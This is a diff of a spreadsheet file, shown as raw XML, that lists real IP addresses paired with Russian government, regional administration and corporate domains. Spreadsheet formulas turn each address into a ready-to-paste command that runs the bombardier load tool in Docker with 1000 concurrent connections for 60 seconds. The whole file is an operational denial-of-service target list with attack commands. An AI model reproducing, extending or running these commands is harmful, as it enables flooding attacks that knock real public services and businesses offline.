+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.103.9.191&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>94.103.9.191</t>
   </si>
 </sst>
 </file>
@@ -3146,93 +3227,184 @@
       <c r="E90" s="3"/>
     </row>
     <row r="91" ht="15.35" customHeight="1">
-      <c r="A91" s="2"/>
-      <c r="B91" s="8"/>
-      <c r="C91" s="2"/>
+      <c r="A91" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B91&amp;"&amp;&amp; sleep 5;"</f>
+        <v>212</v>
+      </c>
+      <c r="B91" t="s" s="8">
+        <v>213</v>
+      </c>
+      <c r="C91" t="s" s="2">
+        <v>214</v>
+      </c>
       <c r="D91" s="4"/>
       <c r="E91" s="3"/>
     </row>
     <row r="92" ht="15.35" customHeight="1">
-      <c r="A92" s="2"/>
-      <c r="B92" s="8"/>
-      <c r="C92" s="2"/>
+      <c r="A92" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B92&amp;"&amp;&amp; sleep 5;"</f>
+        <v>215</v>
+      </c>
+      <c r="B92" t="s" s="8">
+        <v>216</v>
+      </c>
+      <c r="C92" t="s" s="2">
+        <v>214</v>
+      </c>
       <c r="D92" s="6"/>
       <c r="E92" s="3"/>
     </row>
     <row r="93" ht="15.35" customHeight="1">
-      <c r="A93" s="2"/>
-      <c r="B93" s="8"/>
-      <c r="C93" s="2"/>
+      <c r="A93" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B93&amp;"&amp;&amp; sleep 5;"</f>
+        <v>217</v>
+      </c>
+      <c r="B93" t="s" s="8">
+        <v>218</v>
+      </c>
+      <c r="C93" t="s" s="2">
+        <v>219</v>
+      </c>
       <c r="D93" s="6"/>
       <c r="E93" s="3"/>
     </row>
     <row r="94" ht="16" customHeight="1">
-      <c r="A94" s="2"/>
-      <c r="B94" s="8"/>
-      <c r="C94" s="2"/>
+      <c r="A94" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B94&amp;"&amp;&amp; sleep 5;"</f>
+        <v>220</v>
+      </c>
+      <c r="B94" t="s" s="8">
+        <v>221</v>
+      </c>
+      <c r="C94" t="s" s="2">
+        <v>222</v>
+      </c>
       <c r="D94" s="6"/>
       <c r="E94" s="3"/>
     </row>
     <row r="95" ht="16" customHeight="1">
-      <c r="A95" s="2"/>
-      <c r="B95" s="8"/>
-      <c r="C95" s="2"/>
+      <c r="A95" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B95&amp;"&amp;&amp; sleep 5;"</f>
+        <v>223</v>
+      </c>
+      <c r="B95" t="s" s="8">
+        <v>224</v>
+      </c>
+      <c r="C95" t="s" s="2">
+        <v>222</v>
+      </c>
       <c r="D95" s="6"/>
       <c r="E95" s="3"/>
     </row>
     <row r="96" ht="16" customHeight="1">
-      <c r="A96" s="2"/>
-      <c r="B96" s="8"/>
-      <c r="C96" s="2"/>
+      <c r="A96" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B96&amp;"&amp;&amp; sleep 5;"</f>
+        <v>225</v>
+      </c>
+      <c r="B96" t="s" s="8">
+        <v>226</v>
+      </c>
+      <c r="C96" t="s" s="2">
+        <v>222</v>
+      </c>
       <c r="D96" s="6"/>
       <c r="E96" s="3"/>
     </row>
     <row r="97" ht="15" customHeight="1">
-      <c r="A97" s="2"/>
-      <c r="B97" s="8"/>
-      <c r="C97" s="2"/>
+      <c r="A97" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B97&amp;"&amp;&amp; sleep 5;"</f>
+        <v>223</v>
+      </c>
+      <c r="B97" t="s" s="8">
+        <v>224</v>
+      </c>
+      <c r="C97" t="s" s="2">
+        <v>227</v>
+      </c>
       <c r="D97" s="6"/>
       <c r="E97" s="3"/>
     </row>
     <row r="98" ht="15.35" customHeight="1">
-      <c r="A98" s="2"/>
-      <c r="B98" s="8"/>
-      <c r="C98" s="2"/>
+      <c r="A98" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B98&amp;"&amp;&amp; sleep 5;"</f>
+        <v>225</v>
+      </c>
+      <c r="B98" t="s" s="8">
+        <v>226</v>
+      </c>
+      <c r="C98" t="s" s="2">
+        <v>227</v>
+      </c>
       <c r="D98" s="6"/>
       <c r="E98" s="3"/>
     </row>
     <row r="99" ht="15.35" customHeight="1">
-      <c r="A99" s="2"/>
-      <c r="B99" s="8"/>
-      <c r="C99" s="2"/>
+      <c r="A99" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B99&amp;"&amp;&amp; sleep 5;"</f>
+        <v>228</v>
+      </c>
+      <c r="B99" t="s" s="8">
+        <v>229</v>
+      </c>
+      <c r="C99" t="s" s="2">
+        <v>227</v>
+      </c>
       <c r="D99" s="6"/>
       <c r="E99" s="3"/>
     </row>
     <row r="100" ht="15.35" customHeight="1">
-      <c r="A100" s="2"/>
-      <c r="B100" s="8"/>
-      <c r="C100" s="2"/>
+      <c r="A100" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B100&amp;"&amp;&amp; sleep 5;"</f>
+        <v>230</v>
+      </c>
+      <c r="B100" t="s" s="8">
+        <v>231</v>
+      </c>
+      <c r="C100" t="s" s="2">
+        <v>232</v>
+      </c>
       <c r="D100" s="6"/>
       <c r="E100" s="3"/>
     </row>
     <row r="101" ht="15.35" customHeight="1">
-      <c r="A101" s="2"/>
-      <c r="B101" s="8"/>
-      <c r="C101" s="2"/>
+      <c r="A101" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B101&amp;"&amp;&amp; sleep 5;"</f>
+        <v>233</v>
+      </c>
+      <c r="B101" t="s" s="8">
+        <v>234</v>
+      </c>
+      <c r="C101" t="s" s="2">
+        <v>232</v>
+      </c>
       <c r="D101" s="6"/>
       <c r="E101" s="3"/>
     </row>
     <row r="102" ht="15.35" customHeight="1">
-      <c r="A102" s="2"/>
-      <c r="B102" s="8"/>
-      <c r="C102" s="2"/>
+      <c r="A102" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B102&amp;"&amp;&amp; sleep 5;"</f>
+        <v>235</v>
+      </c>
+      <c r="B102" t="s" s="8">
+        <v>236</v>
+      </c>
+      <c r="C102" t="s" s="2">
+        <v>232</v>
+      </c>
       <c r="D102" s="6"/>
       <c r="E102" s="3"/>
     </row>
     <row r="103" ht="15.35" customHeight="1">
-      <c r="A103" s="2"/>
-      <c r="B103" s="8"/>
-      <c r="C103" s="2"/>
+      <c r="A103" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B103&amp;"&amp;&amp; sleep 5;"</f>
+        <v>237</v>
+      </c>
+      <c r="B103" t="s" s="8">
+        <v>238</v>
+      </c>
+      <c r="C103" t="s" s="2">
+        <v>232</v>
+      </c>
       <c r="D103" s="6"/>
       <c r="E103" s="3"/>
     </row>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,7 +11,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="239">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="234">
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.169.155.189&amp;&amp; sleep 5;</t>
   </si>
@@ -533,21 +533,6 @@
   </si>
   <si>
     <t>segezha-group.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.47.160.18&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>84.47.160.18</t>
-  </si>
-  <si>
-    <t>seligdar.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.47.160.19&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>84.47.160.19</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.23.51.195&amp;&amp; sleep 5;</t>
@@ -1953,7 +1938,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <dimension ref="A1:E658"/>
+  <dimension ref="A1:E656"/>
   <sheetViews>
     <sheetView workbookViewId="0" showGridLines="0" defaultGridColor="1"/>
   </sheetViews>
@@ -3039,7 +3024,7 @@
         <v>178</v>
       </c>
       <c r="C77" t="s" s="2">
-        <v>176</v>
+        <v>179</v>
       </c>
       <c r="D77" s="3"/>
       <c r="E77" s="3"/>
@@ -3047,13 +3032,13 @@
     <row r="78" ht="15.35" customHeight="1">
       <c r="A78" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B78&amp;"&amp;&amp; sleep 5;"</f>
+        <v>180</v>
+      </c>
+      <c r="B78" t="s" s="8">
+        <v>181</v>
+      </c>
+      <c r="C78" t="s" s="2">
         <v>179</v>
-      </c>
-      <c r="B78" t="s" s="8">
-        <v>180</v>
-      </c>
-      <c r="C78" t="s" s="2">
-        <v>181</v>
       </c>
       <c r="D78" s="3"/>
       <c r="E78" s="3"/>
@@ -3067,7 +3052,7 @@
         <v>183</v>
       </c>
       <c r="C79" t="s" s="2">
-        <v>184</v>
+        <v>179</v>
       </c>
       <c r="D79" s="3"/>
       <c r="E79" s="3"/>
@@ -3075,13 +3060,13 @@
     <row r="80" ht="15.35" customHeight="1">
       <c r="A80" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B80&amp;"&amp;&amp; sleep 5;"</f>
+        <v>184</v>
+      </c>
+      <c r="B80" t="s" s="8">
         <v>185</v>
       </c>
-      <c r="B80" t="s" s="8">
+      <c r="C80" t="s" s="2">
         <v>186</v>
-      </c>
-      <c r="C80" t="s" s="2">
-        <v>184</v>
       </c>
       <c r="D80" s="3"/>
       <c r="E80" s="3"/>
@@ -3095,7 +3080,7 @@
         <v>188</v>
       </c>
       <c r="C81" t="s" s="2">
-        <v>184</v>
+        <v>189</v>
       </c>
       <c r="D81" s="3"/>
       <c r="E81" s="3"/>
@@ -3103,13 +3088,13 @@
     <row r="82" ht="15.35" customHeight="1">
       <c r="A82" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B82&amp;"&amp;&amp; sleep 5;"</f>
-        <v>189</v>
+        <v>190</v>
       </c>
       <c r="B82" t="s" s="8">
-        <v>190</v>
+        <v>191</v>
       </c>
       <c r="C82" t="s" s="2">
-        <v>191</v>
+        <v>192</v>
       </c>
       <c r="D82" s="3"/>
       <c r="E82" s="3"/>
@@ -3117,13 +3102,13 @@
     <row r="83" ht="15.35" customHeight="1">
       <c r="A83" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B83&amp;"&amp;&amp; sleep 5;"</f>
+        <v>193</v>
+      </c>
+      <c r="B83" t="s" s="8">
+        <v>194</v>
+      </c>
+      <c r="C83" t="s" s="2">
         <v>192</v>
-      </c>
-      <c r="B83" t="s" s="8">
-        <v>193</v>
-      </c>
-      <c r="C83" t="s" s="2">
-        <v>194</v>
       </c>
       <c r="D83" s="3"/>
       <c r="E83" s="3"/>
@@ -3137,7 +3122,7 @@
         <v>196</v>
       </c>
       <c r="C84" t="s" s="2">
-        <v>197</v>
+        <v>192</v>
       </c>
       <c r="D84" s="3"/>
       <c r="E84" s="3"/>
@@ -3145,13 +3130,13 @@
     <row r="85" ht="15.35" customHeight="1">
       <c r="A85" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B85&amp;"&amp;&amp; sleep 5;"</f>
+        <v>197</v>
+      </c>
+      <c r="B85" t="s" s="8">
         <v>198</v>
       </c>
-      <c r="B85" t="s" s="8">
-        <v>199</v>
-      </c>
       <c r="C85" t="s" s="2">
-        <v>197</v>
+        <v>192</v>
       </c>
       <c r="D85" s="3"/>
       <c r="E85" s="3"/>
@@ -3159,13 +3144,13 @@
     <row r="86" ht="15.35" customHeight="1">
       <c r="A86" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B86&amp;"&amp;&amp; sleep 5;"</f>
+        <v>199</v>
+      </c>
+      <c r="B86" t="s" s="8">
         <v>200</v>
       </c>
-      <c r="B86" t="s" s="8">
-        <v>201</v>
-      </c>
       <c r="C86" t="s" s="2">
-        <v>197</v>
+        <v>192</v>
       </c>
       <c r="D86" s="3"/>
       <c r="E86" s="3"/>
@@ -3173,13 +3158,13 @@
     <row r="87" ht="15.35" customHeight="1">
       <c r="A87" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B87&amp;"&amp;&amp; sleep 5;"</f>
+        <v>201</v>
+      </c>
+      <c r="B87" t="s" s="8">
         <v>202</v>
       </c>
-      <c r="B87" t="s" s="8">
+      <c r="C87" t="s" s="2">
         <v>203</v>
-      </c>
-      <c r="C87" t="s" s="2">
-        <v>197</v>
       </c>
       <c r="D87" s="3"/>
       <c r="E87" s="3"/>
@@ -3193,37 +3178,37 @@
         <v>205</v>
       </c>
       <c r="C88" t="s" s="2">
-        <v>197</v>
-      </c>
-      <c r="D88" s="3"/>
+        <v>206</v>
+      </c>
+      <c r="D88" s="2"/>
       <c r="E88" s="3"/>
     </row>
     <row r="89" ht="15.35" customHeight="1">
       <c r="A89" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B89&amp;"&amp;&amp; sleep 5;"</f>
-        <v>206</v>
+        <v>207</v>
       </c>
       <c r="B89" t="s" s="8">
-        <v>207</v>
+        <v>208</v>
       </c>
       <c r="C89" t="s" s="2">
-        <v>208</v>
-      </c>
-      <c r="D89" s="3"/>
+        <v>209</v>
+      </c>
+      <c r="D89" s="4"/>
       <c r="E89" s="3"/>
     </row>
     <row r="90" ht="15.35" customHeight="1">
       <c r="A90" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B90&amp;"&amp;&amp; sleep 5;"</f>
+        <v>210</v>
+      </c>
+      <c r="B90" t="s" s="8">
+        <v>211</v>
+      </c>
+      <c r="C90" t="s" s="2">
         <v>209</v>
       </c>
-      <c r="B90" t="s" s="8">
-        <v>210</v>
-      </c>
-      <c r="C90" t="s" s="2">
-        <v>211</v>
-      </c>
-      <c r="D90" s="2"/>
+      <c r="D90" s="6"/>
       <c r="E90" s="3"/>
     </row>
     <row r="91" ht="15.35" customHeight="1">
@@ -3237,10 +3222,10 @@
       <c r="C91" t="s" s="2">
         <v>214</v>
       </c>
-      <c r="D91" s="4"/>
+      <c r="D91" s="6"/>
       <c r="E91" s="3"/>
     </row>
-    <row r="92" ht="15.35" customHeight="1">
+    <row r="92" ht="16" customHeight="1">
       <c r="A92" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B92&amp;"&amp;&amp; sleep 5;"</f>
         <v>215</v>
@@ -3249,21 +3234,21 @@
         <v>216</v>
       </c>
       <c r="C92" t="s" s="2">
-        <v>214</v>
+        <v>217</v>
       </c>
       <c r="D92" s="6"/>
       <c r="E92" s="3"/>
     </row>
-    <row r="93" ht="15.35" customHeight="1">
+    <row r="93" ht="16" customHeight="1">
       <c r="A93" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B93&amp;"&amp;&amp; sleep 5;"</f>
+        <v>218</v>
+      </c>
+      <c r="B93" t="s" s="8">
+        <v>219</v>
+      </c>
+      <c r="C93" t="s" s="2">
         <v>217</v>
-      </c>
-      <c r="B93" t="s" s="8">
-        <v>218</v>
-      </c>
-      <c r="C93" t="s" s="2">
-        <v>219</v>
       </c>
       <c r="D93" s="6"/>
       <c r="E93" s="3"/>
@@ -3277,18 +3262,18 @@
         <v>221</v>
       </c>
       <c r="C94" t="s" s="2">
-        <v>222</v>
+        <v>217</v>
       </c>
       <c r="D94" s="6"/>
       <c r="E94" s="3"/>
     </row>
-    <row r="95" ht="16" customHeight="1">
+    <row r="95" ht="15" customHeight="1">
       <c r="A95" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B95&amp;"&amp;&amp; sleep 5;"</f>
-        <v>223</v>
+        <v>218</v>
       </c>
       <c r="B95" t="s" s="8">
-        <v>224</v>
+        <v>219</v>
       </c>
       <c r="C95" t="s" s="2">
         <v>222</v>
@@ -3296,13 +3281,13 @@
       <c r="D95" s="6"/>
       <c r="E95" s="3"/>
     </row>
-    <row r="96" ht="16" customHeight="1">
+    <row r="96" ht="15.35" customHeight="1">
       <c r="A96" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B96&amp;"&amp;&amp; sleep 5;"</f>
-        <v>225</v>
+        <v>220</v>
       </c>
       <c r="B96" t="s" s="8">
-        <v>226</v>
+        <v>221</v>
       </c>
       <c r="C96" t="s" s="2">
         <v>222</v>
@@ -3310,7 +3295,7 @@
       <c r="D96" s="6"/>
       <c r="E96" s="3"/>
     </row>
-    <row r="97" ht="15" customHeight="1">
+    <row r="97" ht="15.35" customHeight="1">
       <c r="A97" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B97&amp;"&amp;&amp; sleep 5;"</f>
         <v>223</v>
@@ -3319,7 +3304,7 @@
         <v>224</v>
       </c>
       <c r="C97" t="s" s="2">
-        <v>227</v>
+        <v>222</v>
       </c>
       <c r="D97" s="6"/>
       <c r="E97" s="3"/>
@@ -3361,7 +3346,7 @@
         <v>231</v>
       </c>
       <c r="C100" t="s" s="2">
-        <v>232</v>
+        <v>227</v>
       </c>
       <c r="D100" s="6"/>
       <c r="E100" s="3"/>
@@ -3369,42 +3354,28 @@
     <row r="101" ht="15.35" customHeight="1">
       <c r="A101" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B101&amp;"&amp;&amp; sleep 5;"</f>
+        <v>232</v>
+      </c>
+      <c r="B101" t="s" s="8">
         <v>233</v>
       </c>
-      <c r="B101" t="s" s="8">
-        <v>234</v>
-      </c>
       <c r="C101" t="s" s="2">
-        <v>232</v>
+        <v>227</v>
       </c>
       <c r="D101" s="6"/>
       <c r="E101" s="3"/>
     </row>
     <row r="102" ht="15.35" customHeight="1">
-      <c r="A102" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B102&amp;"&amp;&amp; sleep 5;"</f>
-        <v>235</v>
-      </c>
-      <c r="B102" t="s" s="8">
-        <v>236</v>
-      </c>
-      <c r="C102" t="s" s="2">
-        <v>232</v>
-      </c>
+      <c r="A102" s="2"/>
+      <c r="B102" s="8"/>
+      <c r="C102" s="2"/>
       <c r="D102" s="6"/>
       <c r="E102" s="3"/>
     </row>
     <row r="103" ht="15.35" customHeight="1">
-      <c r="A103" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B103&amp;"&amp;&amp; sleep 5;"</f>
-        <v>237</v>
-      </c>
-      <c r="B103" t="s" s="8">
-        <v>238</v>
-      </c>
-      <c r="C103" t="s" s="2">
-        <v>232</v>
-      </c>
+      <c r="A103" s="2"/>
+      <c r="B103" s="8"/>
+      <c r="C103" s="2"/>
       <c r="D103" s="6"/>
       <c r="E103" s="3"/>
     </row>
@@ -3412,21 +3383,21 @@
       <c r="A104" s="2"/>
       <c r="B104" s="8"/>
       <c r="C104" s="2"/>
-      <c r="D104" s="6"/>
+      <c r="D104" s="5"/>
       <c r="E104" s="3"/>
     </row>
     <row r="105" ht="15.35" customHeight="1">
       <c r="A105" s="2"/>
       <c r="B105" s="8"/>
       <c r="C105" s="2"/>
-      <c r="D105" s="6"/>
+      <c r="D105" s="3"/>
       <c r="E105" s="3"/>
     </row>
     <row r="106" ht="15.35" customHeight="1">
       <c r="A106" s="2"/>
       <c r="B106" s="8"/>
       <c r="C106" s="2"/>
-      <c r="D106" s="5"/>
+      <c r="D106" s="3"/>
       <c r="E106" s="3"/>
     </row>
     <row r="107" ht="15.35" customHeight="1">
@@ -3704,21 +3675,21 @@
     </row>
     <row r="146" ht="15.35" customHeight="1">
       <c r="A146" s="2"/>
-      <c r="B146" s="8"/>
+      <c r="B146" s="9"/>
       <c r="C146" s="2"/>
-      <c r="D146" s="3"/>
+      <c r="D146" s="2"/>
       <c r="E146" s="3"/>
     </row>
     <row r="147" ht="15.35" customHeight="1">
       <c r="A147" s="2"/>
-      <c r="B147" s="8"/>
+      <c r="B147" s="2"/>
       <c r="C147" s="2"/>
-      <c r="D147" s="3"/>
+      <c r="D147" s="2"/>
       <c r="E147" s="3"/>
     </row>
     <row r="148" ht="15.35" customHeight="1">
       <c r="A148" s="2"/>
-      <c r="B148" s="9"/>
+      <c r="B148" s="2"/>
       <c r="C148" s="2"/>
       <c r="D148" s="2"/>
       <c r="E148" s="3"/>
@@ -3776,7 +3747,7 @@
       <c r="A156" s="2"/>
       <c r="B156" s="2"/>
       <c r="C156" s="2"/>
-      <c r="D156" s="2"/>
+      <c r="D156" s="3"/>
       <c r="E156" s="3"/>
     </row>
     <row r="157" ht="15.35" customHeight="1">
@@ -3797,7 +3768,7 @@
       <c r="A159" s="2"/>
       <c r="B159" s="2"/>
       <c r="C159" s="2"/>
-      <c r="D159" s="2"/>
+      <c r="D159" s="3"/>
       <c r="E159" s="3"/>
     </row>
     <row r="160" ht="15.35" customHeight="1">
@@ -4096,29 +4067,29 @@
     </row>
     <row r="202" ht="15.35" customHeight="1">
       <c r="A202" s="2"/>
-      <c r="B202" s="2"/>
-      <c r="C202" s="2"/>
+      <c r="B202" s="10"/>
+      <c r="C202" s="10"/>
       <c r="D202" s="3"/>
       <c r="E202" s="3"/>
     </row>
     <row r="203" ht="15.35" customHeight="1">
       <c r="A203" s="2"/>
-      <c r="B203" s="2"/>
-      <c r="C203" s="2"/>
+      <c r="B203" s="10"/>
+      <c r="C203" s="10"/>
       <c r="D203" s="3"/>
       <c r="E203" s="3"/>
     </row>
     <row r="204" ht="15.35" customHeight="1">
       <c r="A204" s="2"/>
-      <c r="B204" s="10"/>
-      <c r="C204" s="10"/>
+      <c r="B204" s="2"/>
+      <c r="C204" s="2"/>
       <c r="D204" s="3"/>
       <c r="E204" s="3"/>
     </row>
     <row r="205" ht="15.35" customHeight="1">
       <c r="A205" s="2"/>
-      <c r="B205" s="10"/>
-      <c r="C205" s="10"/>
+      <c r="B205" s="2"/>
+      <c r="C205" s="2"/>
       <c r="D205" s="3"/>
       <c r="E205" s="3"/>
     </row>
@@ -4669,16 +4640,16 @@
       <c r="E283" s="3"/>
     </row>
     <row r="284" ht="15.35" customHeight="1">
-      <c r="A284" s="2"/>
-      <c r="B284" s="2"/>
-      <c r="C284" s="2"/>
+      <c r="A284" s="3"/>
+      <c r="B284" s="3"/>
+      <c r="C284" s="3"/>
       <c r="D284" s="3"/>
       <c r="E284" s="3"/>
     </row>
     <row r="285" ht="15.35" customHeight="1">
-      <c r="A285" s="2"/>
-      <c r="B285" s="2"/>
-      <c r="C285" s="2"/>
+      <c r="A285" s="3"/>
+      <c r="B285" s="3"/>
+      <c r="C285" s="3"/>
       <c r="D285" s="3"/>
       <c r="E285" s="3"/>
     </row>
@@ -7278,20 +7249,6 @@
       <c r="C656" s="3"/>
       <c r="D656" s="3"/>
       <c r="E656" s="3"/>
-    </row>
-    <row r="657" ht="15.35" customHeight="1">
-      <c r="A657" s="3"/>
-      <c r="B657" s="3"/>
-      <c r="C657" s="3"/>
-      <c r="D657" s="3"/>
-      <c r="E657" s="3"/>
-    </row>
-    <row r="658" ht="15.35" customHeight="1">
-      <c r="A658" s="3"/>
-      <c r="B658" s="3"/>
-      <c r="C658" s="3"/>
-      <c r="D658" s="3"/>
-      <c r="E658" s="3"/>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,708 +11,105 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="234">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="33">
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.169.155.189&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.45.126&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>185.169.155.189</t>
+    <t>84.42.45.126</t>
   </si>
   <si>
-    <t>дом.рф</t>
+    <t>www.bryanskobl.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.86&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.56.189&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>212.176.31.86</t>
+    <t>84.42.56.189</t>
   </si>
   <si>
-    <t>acron.ru</t>
+    <t>brkmed.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.84.143.170&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.183.45.148&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>194.84.143.170</t>
+    <t>213.183.45.148</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.67&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.249.48.44&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>212.176.31.67</t>
+    <t>89.249.48.44</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.73&amp;&amp; sleep 5;</t>
+    <t>econom32.ru</t>
   </si>
   <si>
-    <t>212.176.31.73</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.23.50.50&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.148.28.41&amp;&amp; sleep 5;</t>
+    <t>5.23.50.50</t>
   </si>
   <si>
-    <t>82.148.28.41</t>
+    <t>depbez.ru</t>
   </si>
   <si>
-    <t>aton.ru</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.223.123.233&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.94&amp;&amp; sleep 5;</t>
+    <t>89.223.123.233</t>
   </si>
   <si>
-    <t>213.129.114.94</t>
+    <t>bga32.ru</t>
   </si>
   <si>
-    <t>efko.ru</t>
+    <t>www.rabota-bryanskobl.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.95&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.107.66.166&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>213.129.114.95</t>
+    <t>91.107.66.166</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.239.33.178&amp;&amp; sleep 5;</t>
+    <t>git32.rostrud.gov.ru</t>
   </si>
   <si>
-    <t>195.239.33.178</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.56.82&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.91&amp;&amp; sleep 5;</t>
+    <t>84.42.56.82</t>
   </si>
   <si>
-    <t>213.129.114.91</t>
+    <t>www.uszn032.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.92&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.248&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>213.129.114.92</t>
+    <t>87.236.16.248</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.115.54&amp;&amp; sleep 5;</t>
+    <t>archive-bryansk.ru</t>
   </si>
   <si>
-    <t>213.129.115.54</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.199.149.231&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.93&amp;&amp; sleep 5;</t>
+    <t>91.199.149.231</t>
   </si>
   <si>
-    <t>213.129.114.93</t>
+    <t>gzhi32.ru</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.89&amp;&amp; sleep 5;</t>
